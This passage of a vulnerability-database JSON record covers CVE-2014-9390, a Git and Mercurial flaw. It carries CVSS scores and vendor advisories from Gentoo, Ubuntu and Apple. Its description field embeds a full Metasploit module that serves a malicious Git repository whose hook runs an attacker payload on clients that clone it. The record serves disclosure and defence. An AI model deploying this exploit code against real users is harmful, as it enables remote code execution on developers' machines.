              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2014-008933",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-77335",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-9390",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2014-008933",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2014-9390",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2014-008933",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201412-509",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-77335",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-9390",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. \nSuccessful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data. \n\nBackground\n==========\n\nGit is a free and open source distributed version control system\ndesigned to handle everything from small to very large projects with\nspeed and efficiency. ##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit4 \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpServer\n  include Msf::Exploit::Powershell\n\n  def initialize(info = {})\n    super(update_info(\n      info,\n      \u0027Name\u0027 =\u003e \u0027Malicious Git and Mercurial HTTP Server For CVE-2014-9390\u0027,\n      \u0027Description\u0027 =\u003e %q(\n        This module exploits CVE-2014-9390, which affects Git (versions less\n        than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n        less than 3.2.3) and describes three vulnerabilities. \n\n        On operating systems which have case-insensitive file systems, like\n        Windows and OS X, Git clients can be convinced to retrieve and\n        overwrite sensitive configuration files in the .git\n        directory which can allow arbitrary code execution if a vulnerable\n        client can be convinced to perform certain actions (for example,\n        a checkout) against a malicious Git repository. \n\n        The third vulnerability with similar characteristics only affects\n        Mercurial clients on Windows, where Windows \"short names\"\n        (MS-DOS-compatible 8.3 format) are supported. \n\n        Today this module only truly supports the first vulnerability (Git\n        clients on case-insensitive file systems) but has the functionality to\n        support the remaining two with a little work. \n      ),\n      \u0027License\u0027 =\u003e MSF_LICENSE,\n      \u0027Author\u0027 =\u003e [\n        \u0027Jon Hart \u003cjon_hart[at]rapid7.com\u003e\u0027 # metasploit module\n      ],\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027CVE\u0027, \u00272014-9390\u0027],\n          [\u0027URL\u0027, \u0027https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial\u0027],\n          [\u0027URL\u0027, \u0027http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html\u0027],\n          [\u0027URL\u0027, \u0027http://article.gmane.org/gmane.linux.kernel/1853266\u0027],\n          [\u0027URL\u0027, \u0027https://github.com/blog/1938-vulnerability-announced-update-your-git-clients\u0027],\n          [\u0027URL\u0027, \u0027https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/\u0027],\n          [\u0027URL\u0027, \u0027http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29\u0027],\n          [\u0027URL\u0027, \u0027http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e\u0027],\n          [\u0027URL\u0027, \u0027http://selenic.com/repo/hg-stable/rev/6dad422ecc5a\u0027]\n\n        ],\n      \u0027DisclosureDate\u0027 =\u003e \u0027Dec 18 2014\u0027,\n      \u0027Targets\u0027 =\u003e\n        [\n          [\n            \u0027Automatic\u0027,\n            {\n              \u0027Platform\u0027 =\u003e [ \u0027unix\u0027 ],\n              \u0027Arch\u0027     =\u003e ARCH_CMD,\n              \u0027Payload\u0027        =\u003e\n                {\n                  \u0027Compat\u0027      =\u003e\n                    {\n                      \u0027PayloadType\u0027 =\u003e \u0027cmd cmd_bash\u0027,\n                      \u0027RequiredCmd\u0027 =\u003e \u0027generic bash-tcp perl bash\u0027\n                    }\n                }\n            }\n          ],\n          [\n            \u0027Windows Powershell\u0027,\n            {\n              \u0027Platform\u0027 =\u003e [ \u0027windows\u0027 ],\n              \u0027Arch\u0027     =\u003e [ARCH_X86, ARCH_X86_64]\n            }\n          ]\n        ],\n      \u0027DefaultTarget\u0027  =\u003e 0))\n\n    register_options(\n      [\n        OptBool.new(\u0027GIT\u0027, [true, \u0027Exploit Git clients\u0027, true])\n      ]\n    )\n\n    register_advanced_options(\n      [\n        OptString.new(\u0027GIT_URI\u0027, [false, \u0027The URI to use as the malicious Git instance (empty for random)\u0027, \u0027\u0027]),\n        OptString.new(\u0027MERCURIAL_URI\u0027, [false, \u0027The URI to use as the malicious Mercurial instance (empty for random)\u0027, \u0027\u0027]),\n        OptString.new(\u0027GIT_HOOK\u0027, [false, \u0027The Git hook to use for exploitation\u0027, \u0027post-checkout\u0027]),\n        OptString.new(\u0027MERCURIAL_HOOK\u0027, [false, \u0027The Mercurial hook to use for exploitation\u0027, \u0027update\u0027]),\n        OptBool.new(\u0027MERCURIAL\u0027, [false, \u0027Enable experimental Mercurial support\u0027, false])\n      ]\n    )\n  end\n\n  def setup\n    # the exploit requires that we act enough like a real Mercurial HTTP instance,\n    # so we keep a mapping of all of the files and the corresponding data we\u0027ll\n    # send back along with a trigger file that signifies that the git/mercurial\n    # client has fetched the malicious content. \n    @repo_data = {\n      git: { files: {}, trigger: nil },\n      mercurial: { files: {}, trigger: nil }\n    }\n\n    unless datastore[\u0027GIT\u0027] || datastore[\u0027MERCURIAL\u0027]\n      fail_with(Exploit::Failure::BadConfig, \u0027Must specify at least one GIT and/or MERCURIAL\u0027)\n    end\n\n    setup_git\n    setup_mercurial\n\n    super\n  end\n\n  def setup_git\n    return unless datastore[\u0027GIT\u0027]\n    # URI must start with a /\n    unless git_uri \u0026\u0026 git_uri =~ /^\\//\n      fail_with(Exploit::Failure::BadConfig, \u0027GIT_URI must start with a /\u0027)\n    end\n    # sanity check the malicious hook:\n    if datastore[\u0027GIT_HOOK\u0027].blank?\n      fail_with(Exploit::Failure::BadConfig, \u0027GIT_HOOK must not be blank\u0027)\n    end\n\n    # In .git/hooks/ directory, specially named files are shell scripts that\n    # are executed when particular events occur.  For example, if\n    # .git/hooks/post-checkout was an executable shell script, a git client\n    # would execute that file every time anything is checked out.  There are\n    # various other files that can be used to achieve similar goals but related\n    # to committing, updating, etc. \n    #\n    # This builds a fake git repository using the knowledge from:\n    #\n    #   http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n    #   http://schacon.github.io/gitbook/7_browsing_git_objects.html\n    case target.name\n    when \u0027Automatic\u0027\n      full_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\"\n    when \u0027Windows Powershell\u0027\n      psh = cmd_psh_payload(payload.encoded,\n                            payload_instance.arch.first,\n                            remove_comspec: true,\n                            encode_final_payload: true)\n      full_cmd = \"#!/bin/sh\\n#{psh}\"\n    end\n\n    sha1, content = build_object(\u0027blob\u0027, full_cmd)\n    trigger = \"/objects/#{get_path(sha1)}\"\n    @repo_data[:git][:trigger] = trigger\n    @repo_data[:git][:files][trigger] = content\n    # build tree that points to the blob\n    sha1, content = build_object(\u0027tree\u0027, \"100755 #{datastore[\u0027GIT_HOOK\u0027]}\\0#{[sha1].pack(\u0027H*\u0027)}\")\n    @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n    # build a tree that points to the hooks directory in which the hook lives, called hooks\n    sha1, content = build_object(\u0027tree\u0027, \"40000 hooks\\0#{[sha1].pack(\u0027H*\u0027)}\")\n    @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n    # build a tree that points to the partially uppercased .git directory in\n    # which hooks live\n    variants = []\n    %w(g G). each do |g|\n      %w(i I).each do |i|\n        %w(t T).each do |t|\n          git = g + i + t\n          variants \u003c\u003c git unless git.chars.none? { |c| c == c.upcase }\n        end\n      end\n    end\n    git_dir = \u0027.\u0027 + variants.sample\n    sha1, content = build_object(\u0027tree\u0027, \"40000 #{git_dir}\\0#{[sha1].pack(\u0027H*\u0027)}\")\n    @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n    # build the supposed commit that dropped this file, which has a random user/company\n    email = Rex::Text.rand_mail_address\n    first, last, company = email.scan(/([^\\.]+)\\.([^\\.]+)@(.*)$/).flatten\n    full_name = \"#{first.capitalize} #{last.capitalize}\"\n    tstamp = Time.now.to_i\n    author_time = rand(tstamp)\n    commit_time = rand(author_time)\n    tz_off = rand(10)\n    commit = \"author #{full_name} \u003c#{email}\u003e #{author_time} -0#{tz_off}00\\n\" \\\n             \"committer #{full_name} \u003c#{email}\u003e #{commit_time} -0#{tz_off}00\\n\" \\\n             \"\\n\" \\\n             \"Initial commit to open git repository for #{company}!\\n\"\n    if datastore[\u0027VERBOSE\u0027]\n      vprint_status(\"Malicious Git commit of #{git_dir}/#{datastore[\u0027GIT_HOOK\u0027]} is:\")\n      commit.each_line { |l| vprint_status(l.strip) }\n    end\n    sha1, content = build_object(\u0027commit\u0027, \"tree #{sha1}\\n#{commit}\")\n    @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n    # build HEAD\n    @repo_data[:git][:files][\u0027/HEAD\u0027] = \"ref: refs/heads/master\\n\"\n    # lastly, build refs\n    @repo_data[:git][:files][\u0027/info/refs\u0027] = \"#{sha1}\\trefs/heads/master\\n\"\n  end\n\n  def setup_mercurial\n    return unless datastore[\u0027MERCURIAL\u0027]\n    # URI must start with a /\n    unless mercurial_uri \u0026\u0026 mercurial_uri =~ /^\\//\n      fail_with(Exploit::Failure::BadConfig, \u0027MERCURIAL_URI must start with a /\u0027)\n    end\n    # sanity check the malicious hook\n    if datastore[\u0027MERCURIAL_HOOK\u0027].blank?\n      fail_with(Exploit::Failure::BadConfig, \u0027MERCURIAL_HOOK must not be blank\u0027)\n    end\n    # we fake the Mercurial HTTP protocol such that we are compliant as possible but\n    # also as simple as possible so that we don\u0027t have to support all of the protocol\n    # complexities.  Taken from:\n    #   http://mercurial.selenic.com/wiki/HttpCommandProtocol\n    #   http://selenic.com/hg/file/tip/mercurial/wireproto.py\n    @repo_data[:mercurial][:files][\u0027?cmd=capabilities\u0027] = \u0027heads getbundle=HG10UN\u0027\n    fake_sha1 = \u0027e6c39c507d7079cfff4963a01ea3a195b855d814\u0027\n    @repo_data[:mercurial][:files][\u0027?cmd=heads\u0027] = \"#{fake_sha1}\\n\"\n    # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat\n    @repo_data[:mercurial][:files][\"?cmd=getbundle\u0026common=#{\u00270\u0027 * 40}\u0026heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\")\n\n    # TODO: finish building the fake repository\n  end\n\n  # Build\u0027s a Git object\n  def build_object(type, content)\n    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n    header = \"#{type} #{content.size}\\0\"\n    store = header + content\n    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]\n  end\n\n  # Returns the Git object path name that a file with the provided SHA1 will reside in\n  def get_path(sha1)\n    sha1[0...2] + \u0027/\u0027 + sha1[2..40]\n  end\n\n  def exploit\n    super\n  end\n\n  def primer\n    # add the git and mercurial URIs as necessary\n    if datastore[\u0027GIT\u0027]\n      hardcoded_uripath(git_uri)\n      print_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\")\n    end\n    if datastore[\u0027MERCURIAL\u0027]\n      hardcoded_uripath(mercurial_uri)\n      print_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\")\n    end\n  end\n\n  # handles routing any request to the mock git, mercurial or simple HTML as necessary\n  def on_request_uri(cli, req)\n    # if the URI is one of our repositories and the user-agent is that of git/mercurial\n    # send back the appropriate data, otherwise just show the HTML version\n    if (user_agent = req.headers[\u0027User-Agent\u0027])\n      if datastore[\u0027GIT\u0027] \u0026\u0026 user_agent =~ /^git\\// \u0026\u0026 req.uri.start_with?(git_uri)\n        do_git(cli, req)\n        return\n      elsif datastore[\u0027MERCURIAL\u0027] \u0026\u0026 user_agent =~ /^mercurial\\// \u0026\u0026 req.uri.start_with?(mercurial_uri)\n        do_mercurial(cli, req)\n        return\n      end\n    end\n\n    do_html(cli, req)\n  end\n\n  # simulates a Git HTTP server\n  def do_git(cli, req)\n    # determine if the requested file is something we know how to serve from our\n    # fake repository and send it if so\n    req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, \u0027\u0027)\n    if @repo_data[:git][:files].key?(req_file)\n      vprint_status(\"Sending Git #{req_file}\")\n      send_response(cli, @repo_data[:git][:files][req_file])\n      if req_file == @repo_data[:git][:trigger]\n        vprint_status(\"Trigger!\")\n        # Do we need this?  If so, how can I update the payload which is in a file which\n        # has already been built?\n        # regenerate_payload\n        handler(cli)\n      end\n    else\n      vprint_status(\"Git #{req_file} doesn\u0027t exist\")\n      send_not_found(cli)\n    end\n  end\n\n  # simulates an HTTP server with simple HTML content that lists the fake\n  # repositories available for cloning\n  def do_html(cli, _req)\n    resp = create_response\n    resp.body = \u003c\u003cHTML\n     \u003chtml\u003e\n      \u003chead\u003e\u003ctitle\u003ePublic Repositories\u003c/title\u003e\u003c/head\u003e\n      \u003cbody\u003e\n        \u003cp\u003eHere are our public repositories:\u003c/p\u003e\n        \u003cul\u003e\nHTML\n\n    if datastore[\u0027GIT\u0027]\n      this_git_uri = URI.parse(get_uri).merge(git_uri)\n      resp.body \u003c\u003c \"\u003cli\u003e\u003ca href=#{git_uri}\u003eGit\u003c/a\u003e (clone with `git clone #{this_git_uri}`)\u003c/li\u003e\"\n    else\n      resp.body \u003c\u003c \"\u003cli\u003e\u003ca\u003eGit\u003c/a\u003e (currently offline)\u003c/li\u003e\"\n    end\n\n    if datastore[\u0027MERCURIAL\u0027]\n      this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)\n      resp.body \u003c\u003c \"\u003cli\u003e\u003ca href=#{mercurial_uri}\u003eMercurial\u003c/a\u003e (clone with `hg clone #{this_mercurial_uri}`)\u003c/li\u003e\"\n    else\n      resp.body \u003c\u003c \"\u003cli\u003e\u003ca\u003eMercurial\u003c/a\u003e (currently offline)\u003c/li\u003e\"\n    end\n    resp.body \u003c\u003c \u003c\u003cHTML\n        \u003c/ul\u003e\n      \u003c/body\u003e\n    \u003c/html\u003e\nHTML\n\n    cli.send_response(resp)\n  end\n\n  # simulates a Mercurial HTTP server\n  def do_mercurial(cli, req)\n    # determine if the requested file is something we know how to serve from our\n    # fake repository and send it if so\n    uri = URI.parse(req.uri)\n    req_path = uri.path\n    req_path += \"?#{uri.query}\" if uri.query\n    req_path.gsub!(/^#{mercurial_uri}/, \u0027\u0027)\n    if @repo_data[:mercurial][:files].key?(req_path)\n      vprint_status(\"Sending Mercurial #{req_path}\")\n      send_response(cli, @repo_data[:mercurial][:files][req_path], \u0027Content-Type\u0027 =\u003e \u0027application/mercurial-0.1\u0027)\n      if req_path == @repo_data[:mercurial][:trigger]\n        vprint_status(\"Trigger!\")\n        # Do we need this?  If so, how can I update the payload which is in a file which\n        # has already been built?\n        # regenerate_payload\n        handler(cli)\n      end\n    else\n      vprint_status(\"Mercurial #{req_path} doesn\u0027t exist\")\n      send_not_found(cli)\n    end\n  end\n\n  # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n  def git_uri\n    return @git_uri if @git_uri\n    if datastore[\u0027GIT_URI\u0027].blank?\n      @git_uri = \u0027/\u0027 + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + \u0027.git\u0027\n    else\n      @git_uri = datastore[\u0027GIT_URI\u0027]\n    end\n  end\n\n  # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI\n  def mercurial_uri\n    return @mercurial_uri if @mercurial_uri\n    if datastore[\u0027MERCURIAL_URI\u0027].blank?\n      @mercurial_uri = \u0027/\u0027 + Rex::Text.rand_text_alpha(rand(10) + 6).downcase\n    else\n      @mercurial_uri = datastore[\u0027MERCURIAL_URI\u0027]\n    end\n  end\nend\n. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201612-19\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: Mercurial: Multiple vulnerabilities\n     Date: December 07, 2016\n     Bugs: #533008, #544332, #578546, #582238\n       ID: 201612-19\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Mercurial, the worst of\nwhich could lead to the remote execution of arbitrary code. \n\nBackground\n==========\n\nMercurial is a distributed source control management system. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  dev-vcs/mercurial            \u003c 3.8.4                    \u003e= 3.8.4\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Mercurial. Please\nreview the CVE identifier and bug reports referenced for details. \n\nImpact\n======\n\nA remote attacker could possibly execute arbitrary code with the\nprivileges of the process. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll mercurial users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=dev-vcs/mercurial-3.8.4\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-9390\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390\n[ 2 ] CVE-2014-9462\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462\n[ 3 ] CVE-2016-3068\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068\n[ 4 ] CVE-2016-3069\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069\n[ 5 ] CVE-2016-3105\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105\n[ 6 ] CVE-2016-3630\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-19\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-2470-1\nJanuary 14, 2015\n\ngit vulnerability\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nGit could be made to run programs as your login if it received specially\ncrafted changes from a remote repository. \n\nSoftware Description:\n- git: fast, scalable, distributed revision control system\n\nDetails:\n\nMatt Mackall and Augie Fackler discovered that Git incorrectly handled certain\nfilesystem paths. The\nremote attacker would need write access to a Git repository that the victim\npulls from. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n  git                             1:2.1.0-1ubuntu0.1\n\nUbuntu 14.04 LTS:\n  git                             1:1.9.1-1ubuntu0.1\n\nUbuntu 12.04 LTS:\n  git                             1:1.7.9.5-1ubuntu0.1\n\nAfter a standard system update you need to set the core.protectHFS and/or\ncore.protectNTFS Git configuration variables to \"true\" if you store Git trees\nin HFS+ and/or NTFS filesystems. If you host Git trees, setting the\ncore.protectHFS, core.protectNTFS, and receive.fsckObjects Git configuration\nvariables to \"true\" will cause your Git server to reject objects containing\nmalicious paths intended to overwrite the Git metadata. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-2470-1\n  CVE-2014-9390\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/git/1:2.1.0-1ubuntu0.1\n  https://launchpad.net/ubuntu/+source/git/1:1.9.1-1ubuntu0.1\n  https://launchpad.net/ubuntu/+source/git/1:1.7.9.5-1ubuntu0.1\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2015-03-09-4 Xcode 6.2\n\nXcode 6.2 is now available and addresses the following:\n\nsubversion\nAvailable for:  OS X Mavericks v10.9.4 or later\nImpact:  Multiple vulnerabilities in Apache Subversion\nDescription:  Multiple vulnerabilities existed in Apache Subversion,\nthe most serious of which may have allowed an attacker with a\nprivileged position to spoof SSL servers via a crafted certificate. \nThese issues were addressed by updating Apache Subversion to version\n1.7.19. This issue was\naddressed by adding additional checks. \nCVE-ID\nCVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of\nMercurial\n\nXcode 6.2 may be obtained from:\nhttps://developer.apple.com/xcode/downloads/\n\nTo check that the Xcode has been updated:\n\n* Select Xcode in the menu bar\n* Select About Xcode\n* The version after applying this update will be \"6.2\". \n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.22 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJU+lGxAAoJEBcWfLTuOo7tERsQAJ5wHQDlzixLxaGFWO57SoAk\noK5d6Lfs4p4E7YQ7JxVKPkVEj7l+w4tAhkBhsWpRunA7S5Ym8y44w4VL5SWU8EN6\nBDm1QsLQK60Y1RPIztF2UOuUK26++pnFfLqd1R+q8b4Ir/T/gVZPWao1fkjltpcS\naoQIIhFK1HHLvQypwto68198rPvn3iLolOwWgBuVgyfUi2IRRk1A+8+omsaBD6DV\nBC/l0Zu9z85NFzzAobBEBpUSTMpWBuYJB81huKTRPQrynanYThA7zX6gsRJX78zN\nsbB0VP3Knh8vMlPaX+xLX20pZ+mFTpUNOirN2wwTkI1CmO+9pbXOkFxleJJ52o/n\n4NxRuHMdMCC1r7HpnVauWmvcPedWV71YXo+ck3n9zLb7VUzjiIls6haFfYohgVTz\n/iLzxPrA6UzP2zgD5pve6LOi8N1jO6b6b8QhAa4mxveHc9LUdirJLYsWnjuJh8I3\ns7vt9hT4EJGkA3gSCNWBXoNWvYwFG9t1uuCcHD5OJCrSOKx0U8Il8y0kqj34hcBc\nxYQEmokSyq1GZwGkCo81pFtYJntuxx/9KT5eodFHtzwSsOSZEkg5quHOVOfhE/sz\n1rfpo1zJj+nprPEMsAkCRdB7HPHnBh1yqZGdqjzrMoztXCUa4SPFCkJEUYetmNod\nmOKMaqe/h2aG+8notXKn\n=F+Wn\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "BID",
            "id": "71732"
          },
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "db": "PACKETSTORM",
            "id": "129677"
          },
          {
            "db": "PACKETSTORM",
            "id": "133704"
          },
          {
            "db": "PACKETSTORM",
            "id": "129784"
          },
          {
            "db": "PACKETSTORM",
            "id": "140059"
          },
          {
            "db": "PACKETSTORM",
            "id": "129939"
          },
          {
            "db": "PACKETSTORM",
            "id": "130744"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
